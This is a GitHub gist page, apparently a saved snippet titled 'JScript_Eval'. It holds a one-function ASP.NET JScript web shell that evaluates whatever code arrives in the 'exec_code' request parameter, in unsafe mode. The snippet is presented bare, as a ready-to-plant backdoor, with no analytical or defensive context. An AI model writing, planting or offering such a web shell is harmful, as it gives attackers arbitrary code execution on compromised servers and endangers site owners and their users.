Created
September 9, 2021 08:48
-
-
Save ffcommax/bb443f5c07d19db784236e3376a4a1e0 to your computer and use it in GitHub Desktop.
JScript_Eval
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script language='JScript' runat='server'> | |
| function Page_Load(){ | |
| eval(Request['exec_code'],'unsafe');Response.End; | |
| } | |
| </script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment